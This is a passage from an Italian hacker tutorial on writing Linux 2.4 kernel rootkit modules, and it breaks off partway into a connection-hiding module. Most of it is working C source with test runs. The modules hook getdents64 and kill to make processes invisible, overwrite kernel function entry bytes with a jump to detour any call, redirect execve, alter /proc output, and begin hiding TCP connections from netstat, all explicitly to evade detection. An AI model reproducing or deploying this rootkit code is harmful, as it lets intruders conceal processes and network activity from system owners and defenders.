    */
    
    inode = current->files->fd[fd]->f_dentry->d_inode;
    /* Controlliamo se l'inode e' equivalente a quello di proc */
    if(inode->i_ino== PROC_ROOT_INO) {
    while (((unsigned long ) dir) < (((unsigned long) tmp) + i)) {
        rec=dir->d_reclen;
        /* Ricordate? I nomi delle directory in proc rappresentavano il numero
           del processo. Converto in numero il nome della directory con la
           nostra atoi e poi cerco nella lista se per caso gli e' associato
           qualche processo. Nel caso ce ne sia uno controllo e se e'
	   invisibile procedo con l'eliminarlo dall'output.
	*/
	if ( ((name=get_task(n_atoi(dir->d_name)))&&
	((name->flags&PF_INVISIBLE)==PF_INVISIBLE))) {
	    if (!prev) {
		ret -= rec;
		ptr =
		    (struct linux_dirent64 *) (((unsigned long) dir) +rec);
	    } else {
		
		prev->d_reclen += rec;
		memset(dir, 0, rec);

	    }
	} else
	    prev = dir;
	dir=(struct linux_dirent64 *)(((unsigned long)dir)+rec);
    
    }
    copy_to_user(dirp,ptr,ret);
}
    kfree(tmp);
    return ret;

}

/* Come vedete nulla di difficile, riconosco i segnali speciali ed agisco di
conseguenza */

int n_kill(int pid, int sig) {
	struct task_struct *task=get_task(pid);
	if(task!=NULL) {
		switch(sig) {
			case HIDESIG 	: 	task->flags|=PF_INVISIBLE;
					       	return 0;
			case UNHIDESIG	:	task->flags&=~PF_INVISIBLE;
						return 0;
			default		:	return o_kill(pid,sig);
		}
	}
	return -1;
}

int
init_module(void)
{
    o_getdents64 = sys_call_table[SYS_getdents64];
    o_kill=sys_call_table[SYS_kill];
    sys_call_table[SYS_getdents64] = n_getdents64;
    sys_call_table[SYS_kill]=n_kill;
    EXPORT_NO_SYMBOL;
    return 0;
}
void
cleanup_module(void)
{
    sys_call_table[SYS_getdents64] = o_getdents64;
    sys_call_table[SYS_kill]=o_kill;
}
MODULE_LICENSE("GPL");
<-X->

Questo che segue e' un piccolo programmino per controllare il nostro modulo.
Si limita a chiamare la funzione kill coi parametri "maligni":

<-| LKEPD/prochider.c |->
#include <stdio.h>
#include <sys/types.h>
#include <signal.h>
#include <stdlib.h>
#define HIDE 333
#define UNHIDE 666

void usage(char *arg) {
	fprintf(stderr,"Usage: %s pid command[HIDE | UNHIDE]\n",arg);
	exit(-1);
}

int main(int argc,char *argv[]) {
int sig;

	if(argc<3)
		usage(argv[0]);

	switch(strcmp(argv[2],"HIDE")) {
		case 0: sig=HIDE;
			break;
		default: sig=UNHIDE;
	}
	
	if((sig=kill(atoi(argv[1]),sig))!=0)
		fprintf(stderr,
		"Errore, impossibile effettuare l'operazione richiesta\n");
	return 0;
}
<-X->

Testiamo:
Vortex:/tmp# insmod prochide.o
Vortex:/tmp# ps | grep bash
  545 pts/2    00:00:00 bash
Vortex:/tmp# ./prochider 545 HIDE
Vortex:/tmp# ps | grep bash
Vortex:/tmp# ps | grep ps
Vortex:/tmp# ./prochider 545 UNHIDE
Vortex:/tmp# ps | grep bash
  545 pts/2    00:00:00 bash
Vortex:/tmp# ps | grep ps
  2659 pts/2    00:00:00 ps
Vortex:/tmp#

Come potete vedere funziona perfettamente, e per di piu nasconde automaticamente
anche tutti i figli di un processo nascosto. (Ricordate? Il processo viene
copiato dal padre e cosi' eredita anche il nostro PF_INVISIBLE).


- PARENTESI SUL DETECTING DI PROCESSI

Un approccio di questo tipo e' notevolmente comodo, pero' non e' del tutto
"sicuro" in quanto elimina solo alla "vista" il processo, la sua directory in
/proc continuera' ad essere presente anche se non visibile. Si potrebbe percio'
creare un programma, una specie di scanner, che provi ad aprire tutte le
possibili directory in proc. I nomi delle directory sono da "1" a "PID_MAX",
percio' basterebbe provare ad aprirle tutte in sequenza per scoprire quali sono
i processi effettivamente attivi sulla macchina. Ovviamente si puo' ovviare
anche a questo problema, ma anche le tecniche di rilevamento possono essere
piu' sofisticate, e' un continuare a rincorrersi. Piu' si va a lavorare a basso
livello piu' si guadagna in occultamento e si diventa sempre piu' difficili da
individuare, al tempo stesso pero' piu' andiamo a perdere astrazione nel
funzionamento del kernel piu' aumenta la complessita' dei nostri attacchi e
meno diventiamo portabili, cosa fondamentale per questo genere di software. E'
inutile creare attacchi super se poi l'unica macchina dove in pratica
funzioneranno senza problemi e' la nostra. Comunque sia, vedremo dopo questo
genere di cose, volevo solo farvi capire che non siete in una botte di ferro :)


Note:
[1] Per una rapida e comoda visione dei sorgenti vi consiglio di andare su
http://www.iglu.org.il/lxr/ident
[2] Per ottenere un occultamento ancora piu solido con questo tipo di approccio
bisognerebbe monitorare in modo analogo tutte le syscall della famiglia *stat.
Siccome l'implementazione di questi hook e' piuttosto semplice e ripetitiva lo
lascio come esercizio.


SEZIONE III
===========

- ANCORA SUL DETECTING

Fin qui abbiamo imparato a nascondere file e processi in modo dignitoso, ma
non abbiamo ancora trovato un modo di nascondere "noi" stessi, ovvero la
presenza del nostro modulo. Tralasciamo per un attimo il "far sparire" il
modulo in se stesso, preoccupiamoci intanto di rendere invisibili, o meglio,
di rendere meno visibili i suoi effetti sul sistema.
Noi dopotutto andiamo semplicemente a modificare dei puntatori coi nostri hook
alla sys call table, ma sfortunatamente sono delle modifiche in un posto
_estremamente_ controllato e dove e' facile risalire ad eventuali modifiche.
In /boot possiamo trovare un file chiamato System.map . Questo file, creato in
fase di compilazione del kernel, contiene tutti gli indirizzi dei simboli
esportati e non, percio' conterra' anche gli indirizzi autentici delle sys
call:

Vortex:~# grep sys_getdents64 /boot/System.map-2.4.23
c015cb60 T sys_getdents64

Percio' un semplicissimo confronto degli indirizzi presenti nella sys call
table con quelli del System.map ci individuerebbe all'istante.
Bisogna dunque trovare un altro punto dove andare ad agganciarci oppure un
altro modo di agganciarsi che non modifichi gli indirizzi delle funzioni.


- REDIREZIONE DI QUALSIASI FUNZIONE

Con questo paragrafo andremo a lavorare ad un livello un pochettino piu' in
basso rispetto a prima, niente di complicato comunque. Questa tecnica ha il
vantaggio di permetterci di intervenire su qualsiasi funzione mantenendo un
livello di portabilita' estremamente elevato. Chiaramente, se si abusa di
questo sistema, non dobbiamo aspettarci che tutto vada sempre liscio :)

Un controllo degli indirizzi come ho descritto poco fa puo' essere fastidioso
a prima vista, ma ad un'analisi piu' approfondita possiamo notare che e'
incredibilmente stupido: un approccio simile ci puo' dire se viene chiamata la
funzione all'indirizzo corretto, ma non ci da' alcuna informazione riguardo a
cosa viene effettivamente eseguito. Se, ad esempio, il codice in memoria della
syscall venisse sovrascritto da una nostra funzione, il controllo non
rilveverebbe alcunche' di anomalo nonostante sia stato sostituito l'intero
codice.
Chiaramente un lavoro del genere sarebbe piuttosto laborioso, ma ci da'
un'indicazione sulla via da seguire, ovvero la modifica del comportamento della
funzione. Pensateci un attimo, per modificare il lavoro svolto da una funzione
non e' necessario sovrascriverla completamente, basterebbe solo fare in modo
che le prime istruzioni fossero il "richiamare" una nostra funzione, che si
occuperebbe di svolgere il lavoro senza ulteriori complicazioni.
Ad esempio, se la routine originaria fosse questa:

int saluta(void) {

	printf("Ciao\n");
	printf("Ciao\n");
	printf("Ciao\n");
	printf("Ciao\n");
	exit(0);
}

e volessimo sostituirla con questa:

int saluta2(void) {
	
	printf("Ciao ciao ciao\n");
	exit(0);
}

basterebbe fare in modo che "saluta" diventi pressapoco cosi:

int saluta(void) {
	saluta2();
	...
}

Cosi` non si avrebbero nemmeno problemi di dimensioni nel caso in cui la
funzione "maligna" (saluta2) fosse notevolmente piu` grande di quella benigna.
I problemi ora sono:
1) Per sovrascriverla dobbiamo conoscere l'indirizzo della funzione.
2) Trovare un sistema per "inserire" il codice maligno.

Per il punto 1 la risposta e` presto data, nel caso di una syscall ad esempio
potremmo prendere direttamente l'indirizzo dalla sys call table, oppure (per
una qual sorta di ripicca:) dal System.map .
Per il punto 2 potremmo fare cosi`: creiamo a "mano" delle istruzioni in codice
macchina che facciano "saltare" l'esecuzione del programma da un'altra parte
(ovvero direttamente nella nostra funzione) e poi andiamo a sovrascriverle sui
primi bytes della funzione originaria. Cosi` facendo, quando verra` chiamata
la funzione "vittima" questa non fara` altro che "saltare" nella nostra e noi
potremo fare tutto quel che vorremo :)
Ecco il codice di una prima implementazione di quanto detto:

<-| LKEPD/redir.c |->
#define __KERNEL__
#define MODULE
#ifdef CONFIG_MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/module.h>
#include <linux/kernel.h>
#include <sys/syscall.h>
#include <string.h>

#define CODESIZE 7

extern void *sys_call_table[];
unsigned long address;

static char inj_code[CODESIZE]="\xb8\x00\x00\x00\x00\xff\xe0";
/* 
   Ecco la riga magica che inseriremo per farci saltare, questi byte
   significano:

        movl $0,%eax <- Memorizza il valore 0 nel registro eax
        jmp  *%eax   <- Salta al valore contenuto in eax
   
   Nota: ovviamente volendo potremmo usare anche un altro registro per
         effettuare queste operazioni.

   Praticamente, inserisco un valore arbitrario in un registro (valore che nel
   nostro caso sara` l'indirizzo della funzione maligna) ora rappresentato da
   0, e poi "salto" all'indirizzo memorizzato cosi` da modificare il flusso del
   programma.
   Per creare questa sequenza (che in realta` sono gli opcodes delle istruzioni
   coi relativi argomenti) e` sufficiente creare un piccolo programmino che
   contenga queste istruzioni, compilarlo e poi disassemblare:
   
   int main(void) {
   	asm volatile("movl $0,%eax\n"
		     "jmp *%eax\n"
		    );
	return 0;
   }
   
   Lo compiliamo, poi con gdb lo disassembliamo ed otteniamo:
   
   Vortex:~# gcc -ggdb test.c -o test
   Vortex:~# gdb -f ./test
   ....
   ....
   (gdb) disas main
   ....
   ....
   0x8048344 <main+16>:    mov    $0x0,%eax
   0x8048349 <main+21>:    jmp    *%eax
   ....
   End of assembler dump.
   (gdb) x/bx main+16 
   0x8048344 <main+16>:    0xb8
   (gdb)
   0x8048345 <main+17>:    0x00
   (gdb)
   0x8048346 <main+18>:    0x00
   (gdb)
   0x8048347 <main+19>:    0x00
   (gdb)
   0x8048348 <main+20>:    0x00
   (gdb)
   0x8048349 <main+21>:    0xff
   (gdb)
   0x804834a <main+22>:    0xe0
   (gdb)
   
   Ecco fatto :)
*/

static char backup[CODESIZE];

int n_getdents64(void) {
	printk("Funzione rediretta\n");
	return -1;
}

int init_module(void) {

	EXPORT_NO_SYMBOLS;

	address=(unsigned long)sys_call_table[SYS_getdents64];
        /* Memorizzo l'indirizzo della syscall */
	
	memcpy(backup,(unsigned long*)address,CODESIZE);
        /* Copio i primi bytes per il ripristino in caso di unload del
	   modulo */
	
	*(unsigned long*)&inj_code[1]=(unsigned long)n_getdents64;
        /* Scrivo l'indirizzo della nuova funzione nel buffer */
	
	memcpy((unsigned long*)address,inj_code,CODESIZE);
        /* Sovrascrivo il buffer sui primi bytes della funzione originaria */
	
	return 0;
}

void cleanup_module(void) {
	memcpy((unsigned long*)address,backup,CODESIZE);
	/* Ripristino i bytes originali */
}
<-X->

Compiliamo ed inseriamo, poi

Vortex:~# ls
Funzione rediretta
ls: reading directory .: Operation not permitted
total 0
Vortex:~# rmmod redir
Vortex:~# ls
total 0
drwxrwxrwt    4 root     root         4096 Mar  4 03:21 ./
drwxr-xr-x   21 root     root         4096 Mar  3 18:07 ../
Vortex:~#

Molto bene, ma si puo' fare di meglio... ripensate brevemente a tutti gli hook
che abbiamo fatto fino ad ora, possono essere tutti schematicamente riassunti
in questo modo:

- Chiama la funzione originale
- Modifica l'output
- Ritorna l'output modificato

Se tenessimo un hook di questo tipo adottando la tecnica appena spiegata
combineremmo un bel pasticcio, in quanto la "funzione originale" e` proprio
quella modificata per chiamarne un'altra, percio` finiremmo col richiamare
noi stessi all'infinito! Dobbiamo dunque trovare un modo di venirne fuori.
La soluzione (se volete proprio leggerla senza pensarci prima voi) e`
estremamente semplice, basta applicare la stessa tecnica... all'inverso :)
Ovvero, dalla nostra funzione maligna ripristiniamo i bytes originali,
chiamiamo la funzione corretta e perfettamente funzionante, ripristiniamo il
nostro codice di salto e proseguiamo col consueto filtraggio. Questo sistema
si puo' applicare a _qualsiasi_ funzione, in forme piu` o meno "aggressive"[1]
Rivediamo il codice di prima con questa modifica:

<-| LKEPD/redir2.c |->
#define __KERNEL__
#define MODULE
#ifdef CONFIG_MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/dirent.h>
#include <linux/unistd.h>
#include <sys/syscall.h>
#include <string.h>

#define CODESIZE 7

extern void *sys_call_table[];
unsigned long address;

static char inj_code[CODESIZE]="\xb8\x00\x00\x00\x00\xff\xe0";
static char backup[CODESIZE];

int (*o_getdents64)(unsigned int fd, struct dirent *dirp, unsigned int count);

int n_getdents64(unsigned int fd, struct dirent *dirp, unsigned int count) {
	int ret;
	printk("Funzione rediretta\n");
	memcpy((unsigned long*)address,backup,CODESIZE);
	ret=o_getdents64(fd,dirp,count);
	memcpy((unsigned long*)address,inj_code,CODESIZE);
	return ret;
}
	

int init_module(void) {
	o_getdents64=sys_call_table[SYS_getdents64];
	address=(unsigned long)sys_call_table[SYS_getdents64];
	memcpy(backup,(unsigned long*)address,CODESIZE);
	*(unsigned long*)&inj_code[1]=(unsigned long)n_getdents64;
	memcpy((unsigned long*)address,inj_code,CODESIZE);
	return 0;
}

void cleanup_module(void) {
	memcpy((unsigned long*)address,backup,CODESIZE);
}
<-X->

Voila' :)


Note:

[1] Volendo si puo' modificare una funzione anche nel mezzo del suo codice, ma
questo e` notevolmente piu` complesso e meno portabile, vedremo qualche esempio
in seguito.


- REDIREZIONE DELLA EXECVE

Ora che abbiamo imparato ad agganciarci a qualsiasi cosa, vediamo subito una
redirezione semplice semplice che ci permetta di prendere confidenza con la
tecnica, quella della execve.
La sys_execve e` quella sys call che si occupa di far eseguire un programma
quando lo lanciamo dalla nostra shell preferita, una redirezione di questa
funzione percio` vuol dire essere tecnicamente in grado di far eseguire un
programma al posto di un altro, tutto a nostro piacimento.
A parer mio al di la` dell'aspetto puramente "scenico" questa e` una cosa che
non trova grandi applicazioni, o comunque non riveste un ruolo fondamentale
come puo' essere quello della getdents64, comunque sia e` indubbio che a volte
puo' far comodo :)
Andiamo a vedere come e` fatta la sys_execve:

asmlinkage int sys_execve(struct pt_regs regs)
{
       int error;
       char * filename;
       filename = getname((char *) regs.ebx);
       /* Ricava il nome del file che sta per essere eseguito */
	
       error = PTR_ERR(filename);
       if (IS_ERR(filename))
              goto out;
       /* Controlla che non ci sia un errore */
	
       error = do_execve(filename, (char **)regs.ecx, (char **)regs.edx, &regs);
       /* Chiama la funzione che effettivamente svolgera` il lavoro */

       /* Da qui sotto in poi non ci interessa */

       if (error == 0)
              current->ptrace &= ~PT_DTRACE;
       putname(filename);
out:
       return error;
}

Come potete vedere la funzione prende in ingresso una struttura di tipo pt_regs
che rappresenta i vari registri, vengono da li` presi il nome del file che sta
per essere eseguito (filename), la lista degli argomenti (char **)regs.ecx e la
lista delle variabili d'ambiente (char**)regs.edx, poi il tutto viene passato
alla do_execve che si occupera` dell'esecuzione vera e propria. Se noi ci
agganciassimo direttamente alla do_execve avremmo gia` tutti i parametri pronti
per fare i nostri controlli senza dover richiamare altre funzioni, oltre ad
essere ancora piu` difficili da individuare che non hookando la syscall stessa.
L'indirizzo della do_execve oltre ad essere presente in System.map lo e` anche
in /proc/ksyms [ovvero dove troviamo i simboli esportati] percio` anche
stavolta non abbiamo che l'imbarazzo della scelta. In piu`, implementeremo il
modulo in modo che l'inserimento dell'indirizzo della funzione da redirigere
venga fatto al momento dell'inserimento del modulo nel kernel e non sia piu`
"fisso", ovvero all'interno del sorgente.

<-| LKEPD/redexecve.c |->
#define __KERNEL__
#define MODULE
#ifdef CONFIG_MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/module.h>
#include <linux/kernel.h>
#include <sys/syscall.h>
#include <linux/mm.h>
#define CODESIZE 7

unsigned long address;
MODULE_PARM(address,"l");
/* Significa che il modulo avra` un parametro chiamato address di tipo long */

static char inj_code[CODESIZE]="\xb8\x00\x00\x00\x00\xff\xe0";
static char backup[CODESIZE];

char *redirect="/bin/ps";
char *redirect_to="/bin/ls";
/* Quando proveremo ad usare ps al suo posto verra` eseguito ls */

int (*o_do_execve)(char * filename, char ** argv, char ** envp,
                                                       struct pt_regs * regs);

char *my_strdup(char *);

int n_do_execve(char * filename, char ** argv, char ** envp,
                                                       struct pt_regs * regs) {
	int ret;
	memcpy((unsigned long*)address,backup,CODESIZE);
	if (strcmp(filename,redirect)==0)
		ret=o_do_execve(my_strdup(redirect_to),argv,envp,regs);
	else
		ret=o_do_execve(filename,argv,envp,regs);
	memcpy((unsigned long*)address,inj_code,CODESIZE);
	return ret;
}

int init_module(void) {
	EXPORT_NO_SYMBOLS;
	o_do_execve=(void*)address;
	memcpy(backup,(unsigned long*)address,CODESIZE);
	*(unsigned long*)&inj_code[1]=(unsigned long)n_do_execve;
	memcpy((unsigned long*)address,inj_code,CODESIZE);
	return 0;
}

void cleanup_module(void) {
	memcpy((unsigned long*)address,backup,CODESIZE);
}

char *my_strdup(char *parameter)
{
	char *data=(char*)kmalloc(strlen(parameter)+1,GFP_KERNEL);
	if(!data)
		return NULL;
	memset(data,'\0',strlen(parameter)+1);
	memcpy(data,parameter,strlen(parameter));
	return data;
}
<-X->

Vortex:~# grep do_execve /proc/ksyms
c0154d70 do_execve_Rsmp_9c62098f
Vortex:~# insmod redexecve.o address=0xc0154d70
Vortex:~# ps
redexecve.o
Vortex:~# rmmod redexecve
Vortex:~# ps
  PID TTY          TIME CMD
   1472 pts/2    00:00:00 bash
   1513 pts/2    00:00:00 ps
Vortex:~#


- CONSIDERAZIONI

Attacchi di questo tipo possono essere una vera e propria spina nel fianco per
qualcuno che deve cercare tracce della nostra presenza nel sistema dato che
possono essere messi in atto in qualunque punto del kernel alterandone in
qualsiasi modo il funzionamento. Chiaramente, piu` ci si va a nascondere
andando a modificare funzioni sempre piu` a basso livello, piu` la difficolta`
aumenta e si corre il rischio che un hook che funziona su un determinato
kernel/versione del kernel non funzioni su un'altra. Tra le altre cose non
possiamo nemmeno dare per scontata la presenza del System.map e da /proc/ksyms
potremmo non ottenere le informazioni che ci servono.
Strada senza uscita? No, tutt'altro, ma dovremo realizzare degli strumenti
appositi che ci permettano di ottenere le informazioni che ci servono.


SEZIONE IV 
==========

- PROC FILE SYSTEM

Modificare il comportamento delle funzioni non e` l'unica via, esiste anche
un'altra tecnica che permette di ottenere ottimi risultati mantenendo una
portabilita' eccezionale: andare ad interagire col proc file system. Se vi
ricordate, ho accennato al proc file system quando si trattava di capire come
funzionasse il comando "ps" che "stranamente" utilizzava una getdents64 per
vedere quali fossero i processi nel sistema.
Il procfs e` un file system residente completamente in memoria kernel e viene
"generato on demand". Praticamente, solo nel momento in cui noi proviamo ad
accedere ad una delle sue entry questa viene "riempita" coi dati.
Guardate:
Vortex:/proc# ls /proc/version
-r--r--r--    1 root     root            0 Mar  4 19:35 /proc/version 
Vortex:/proc# cat version
Linux version 2.4.23 (root@Vortex) (gcc version 3.3.3 20040125 (prerelease)
                                  (Debian)) #1 SMP Thu Mar 4 16:05:48 CET 2004
Vortex:/proc#
  
Il file sembra essere vuoto, ma nel momento in cui ci accediamo i dati vengono
creati.
Se riuscissimo percio` a modificare il modo in cui questi dati vengono generati
(ovvero le funzioni del procfs) potremmo ingannare tutti quei programmi che si
basano su di esso senza andare a toccare la sys call table.
Come soluzione e` estremamente pulita, in quanto non si vanno a modificare
"pezzi" di funzione, ma la si sostituisce per intero modificando solo puntatori
a funzione.
Vediamo brevemente la struttura di un'entry del procfs:
[Direttamente dai sorgenti del kernel di linux]

/*
 * This is not completely implemented yet. The idea is to
 * create an in-memory tree (like the actual /proc filesystem
 * tree) of these proc_dir_entries, so that we can dynamically
 * add new files to /proc.
 *
 * The "next" pointer creates a linked list of one /proc directory,
 * while parent/subdir create the directory structure (every
 * /proc file has a parent, but "subdir" is NULL for all
 * non-directory entries).
 *
 * "get_info" is called at "read", while "owner" is used to protect module
 * from unloading while proc_dir_entry is in use
 */
       

typedef int (read_proc_t)(char *page, char **start, off_t off,
                       int count, int *eof, void *data);
			  
typedef int (write_proc_t)(struct file *file, const char *buffer,
                       unsigned long count, void *data);
			  
typedef int (get_info_t)(char *, char **, off_t, int);
						     
struct proc_dir_entry {
        unsigned short low_ino;
        unsigned short namelen;
        const char *name;
        mode_t mode;
        nlink_t nlink;
        uid_t uid;
        gid_t gid;
        unsigned long size;
        struct inode_operations * proc_iops;
        struct file_operations * proc_fops;
        get_info_t *get_info;
        struct module *owner;
        struct proc_dir_entry *next, *parent, *subdir;
        void *data;
        read_proc_t *read_proc;
        write_proc_t *write_proc;
        atomic_t count;         /* use count */
        int deleted;            /* delete flag */
        kdev_t  rdev;
};

Non e` necessario comprendere il significato di ogni campo di questa struttura,
vedremo solo quelli che ci interessano.
La struttura del procfs e` a grandi linee questa:

Il puntatore next serve per accedere agli elementi di una lista i cui nodi
rappresentano gli altri "file" del procfs presenti nella directory corrente.

Attraverso il puntatore subdir [come potrete intuire dal nome] si accede alla
sottodirectory. [Contenente a sua volta altre entry ovviamente]

E` percio` possibile scorrerlo tutto partendo dalla radice, come se fosse un fs
normale.
Ora che ne abbiamo visto la struttura, focalizziamoci su cosa modificare per
perseguire i nostri scopi. Quando noi andiamo a leggere il contenuto di un file
in /proc succede approssimativamente questo:
  
- Il kernel rileva il nostro tentativo di lettura del file.
- Il kernel attiva la funzione che genera il contenuto del file.
- Noi vediamo l'output della funzione avendo l'impressione che sia sempre stato
  li`.

Le funzioni relative alla lettura/scrittura indovinate un po' dove sono... si`,
sono nella struttura proc_dir_entry corrispondente :) Percio` basterebbe:

- Individuare l'entry che ci interessa.
- Sostituire la funzione che viene chiamata in lettura.
 
ed il gioco sarebbe fatto.
Vediamo un breve esempio di quanto detto fin'ora, modifichiamo la funzione di
read del file /proc/version in modo che stampi a video una nostra frase.

<-| LKEPD/version.c |-> 
#define __KERNEL__
#define MODULE
#define LINUX
#ifdef CONFIG_MODVERSIONS
#define MODVERSIONS
#include <linux/modversions.h>
#endif
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/dirent.h>
#include <linux/unistd.h>
#include <linux/mm.h>
#include <asm/uaccess.h>
#include <sys/syscall.h>
#include <linux/proc_fs.h>
MODULE_LICENSE("GPL");

int (*o_proc_read_version)(char *page, char **start, off_t off, int count,
                                                        int *eof, void *data);


struct proc_dir_entry *get_version(void)
{
/* Cerchiamo nella lista l'entry che ci interessa */

	struct proc_dir_entry *p=proc_root_fs;
/* Il campo "name" contiene il nome dell'entry */
	while((p!=NULL) && (strcmp(p->name,"version")))
		p=p->next;
	return p;
} 


static int proc_calc_metrics(char *page, char **start, off_t off,
                           int count, int *eof, int len)
{
/* Direttamente dai sorgenti del kernel, questa funzione serve per
   "aggiustare" alcuni valori nel caso ce ne fosse bisogno */
         if (len <= off+count) *eof = 1;
         *start = page + off;
         len -= off;
         if (len>count) len = count;
         if (len<0) len = 0;
         return len;
}

int n_proc_read_version(char *page, char **start, off_t off, int count,
                                                         int *eof, void *data)
{
	int len;
	/* Scriviamo la nostra frase nel buffer che sara` poi visualizzato */
	strcpy(page,"We are evil ~;)\n");
	len=strlen(page);
	return proc_calc_metrics(page, start, off, count, eof, len);
	
}

int init_module(void) {
 	EXPORT_NO_SYMBOLS;
	struct proc_dir_entry *version=get_version();
	
	/* Associo il puntatore della funzione di lettura al mio puntatore */
	o_proc_read_version=version->read_proc;
	/* Sostituisco il puntatore dell'entry in proc con la mia funzione */
	version->read_proc=n_proc_read_version;
	return 0;
}

void cleanup_module(void) 
{
	/* Ripristino la funzione originaria */
	(get_version())->read_proc=o_proc_read_version;
}
<-X->

Vortex:~# insmod version.o
Vortex:~# cat /proc/version
We are evil ~;)
Vortex:~# rmmod version
Vortex:~# cat /proc/version
Linux version 2.4.23 (root@Vortex) (gcc version 3.3.3 20040125 (prerelease)
                                  (Debian)) #1 SMP Thu Mar 4 16:05:48 CET 2004
Vortex:~#


- COME OCCULTARE LE CONNESSIONI

Ora che abbiamo qualche conoscenza in piu` vediamo di utilizzarla in modo
proficuo. Netstat va a leggere le informazioni riguardo alle connessioni
proprio in /proc, e piu` precisamente in /proc/net, come si puo' facilmente
verificare attraverso strace. Questo vuol dire che possiamo nascondere
qualsiasi connessione solo lavorando col procfs senza ricorrere a tecniche
primitive come l'hook della sys_write o della sys_read.
Nell'implementazione che andro` a mostrarvi e` implementato solamente
l'occultamento delle connessioni tcp, ma la tecnica e` perfettamente valida
per nascondere quelle di qualsiasi altro tipo.
Come avrete visto, le connessioni tcp si trovano nel file /proc/net/tcp,
vediamone il formato:
   
Vortex:~# cat /proc/net/tcp
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt
   0: 00000000:1A0B 00000000:0000 0A 00000000:00000000 00:00000000 00000000
   1: 00000000:000F 00000000:0000 0A 00000000:00000000 00:00000000 00000000
  sl  uid  timeout inode
   0:   0        0 2587 1 d43dc800 300 0 0 2 -1
   1:   0        0 2601 1 ce328400 300 0 0 2 -1
	
Vortex:~#

Ci sono due entry numerate 0 ed 1 [i valori identificativi all'estrema
sinistra], percio` le connessioni vengono numerate da 0 ad n-1, poi abbiamo
l'indirizzo locale, la porta locale, indirizzo/porta remote, lo stato ed altre
informazioni. Come e` facile intuire dai valori delle porte locali le
informazioni sono in esadecimale.
Controlliamo con netstat:
Vortex:~# netstat -an
...
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:15              0.0.0.0:*               LISTEN
...
Vortex:~#

ed effettivamente coincidono i valori: 000F -> 15 e 1A0B -> 6667

Mettiamo di voler nascondere tutte le connessioni da/alla porta 6667, non
dovremo fare altro che analizzare ogni riga che dovrebbe essere scritta in
/proc/net/tcp e controllare la presenza della sottostringa :1A0B : se la
troviamo non "scriveremo" la riga incriminata nel buffer di output.
Abbiamo percio` bisogno di individuare:

- L'entry che rappresenta /proc/net/tcp nella lista del procfs.
- La funzione che si occupa di generare i dati che saranno scritti in
  /proc/net/tcp .

La prima parte e` a dir poco immediata: il kernel ci mette gentilmente a
disposizione un puntatore a /proc/net che si chiama proc_net, percio` non
dovremo fare altro che fare proc_net->subdir per accedere ai files che
contiene, e li` scorrere la lista di next in next fino a trovare l'entry dal
nome "tcp".
La seconda parte e` un po' meno immediata, ma non per chissa` che difficolta`,
ma semplicemente perche` nelle entry di /proc/net la funzione di lettura non e`
la read_proc, bensi` la get_info. [Si puo' verificare facilmente guardando i
sorgenti del kernel]. Comunque sia, ora che vi ho detto questo e` diventata una
cosa immediata, percio` non c'e` piu` nessun problema :-)

Vortex:~# rgrep proc_net_create /usr/src/linux/* | grep tcp
...
/usr/src/linux/net/ipv4/af_inet.c:    proc_net_create ("tcp", 0, tcp_get_info);
...
Vortex:~#

La funzione che si occupa di registrare una nuova entry in /proc/net e` la
proc_net_create che come ultimo argomento ha la funzione che verra` utilizzata
per la generazione dell'output.
Come possiamo vedere dal grep la funzione "incriminata" e` la tcp_get_info.
Dal file /usr/src/linux/net/ipv4/tcp_ipv4.c :

#define TMPSZ 150
int tcp_get_info(char *buffer, char **start, off_t offset, int length)
{
    int len = 0, num = 0, i;
    off_t begin, pos = 0;
    char tmpbuf[TMPSZ+1];

    if (offset < TMPSZ)
    len += sprintf(buffer, "%-*s\n", TMPSZ-1,
                       "  sl  local_address rem_address   st tx_queue "
                       "rx_queue tr tm->when retrnsmt   uid  timeout inode");
    ...
    ...
}

Riconoscete la stringa che viene scritta nel buffer? E` esattamente quella che
abbiamo visto guardando in /proc/net/tcp, quella che si trovava sopra l'elenco
delle connessioni. Guardate bene quanto viene scritto nel buffer, TMPSZ-1 che
col \n finale diventa TMPSZ.
Verifichiamo:
Vortex:~# cat /proc/net/tcp
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt
  sl  uid  timeout inode
Vortex:~# cat /proc/net/tcp | wc -c
 150
Vortex:~#

Ottimo, corrisponde, e se andate a vedere anche il resto del codice noterete
che vengono sempre scritti TMPSZ bytes, ogni riga cioe` e` di lunghezza fissa.
Questo ci semplifica enormemente il lavoro di filtraggio in quanto sappiamo
entro quanty bytes dobbiamo aspettarci la stringa da filtrare e possiamo
"tagliarla" di netto senza paura di danneggiare altre entry.
Osservate anche questa riga:
  
if (offset < TMPSZ)
  
Apparentemente non dice molto, ma pensateci un attimo: se il kernel chiama
questa funzione per riempire /proc/net/tcp la riga di intestazione dovra`
esserci sempre, percio` perche` mettere la sprintf dietro questa condizione?
La risposta e` che non e` detto che una sola chiamata alla tcp_get_info riesca
a completare il lavoro, e nel caso in cui venga richiamata una seconda volta
il valore offset ci dice quanto abbiamo gia` scritto. Nel caso in cui non
avessimo ancora scritto niente, offset e` di certo minore di TMPSZ, percio` e`
giusto che venga scritta l'intestazione. Quando invece offset e` maggiore non
e` necessario fare niente e percio` viene saltato.
Per filtrare percio` dovremo:

- Leggere una riga alla volta.
- Controllare se e' una riga da eliminare.
- Nel caso in cui non lo sia dobbiamo patchare l'identificatore della
  connessione e poi scriverla nel buffer. [Ricordate il numerino sulla
  sinistra? Se ci fossero 3 connessioni e la seconda fosse nascosta gli
  identificatori visibili sarebbero 0 e 2, mentre dovrebbero essere 0 ed 1.
  Quello che noi faremo sara' assicurarci che ci sia il numerino esatto].
- Copiare il buffer modificato sul buffer originario.

Ora, ricordiamoci che la funzione potrebbe venire chiamata piu` volte, dobbiamo
assicurarci che "offset" non vada mai oltre un certo valore [ovvero la
dimensione dell'output modificato da noi] perche` potrebbe trovare valori
"scomodi". Dobbiamo percio` calcolare le dimensioni dell'output maligno e fare
in modo che offset non superi mai quel valore.
Ecco l'implementazione di quanto spiegato fin'ora:

<-| LKEPD/nethide.c |-> 
#define __KERNEL__
#define MODULE
#define LINUX
#ifdef CONFIG_MODVERSIONS
#define MODVERSIONS
#include <linux/modversions.h>
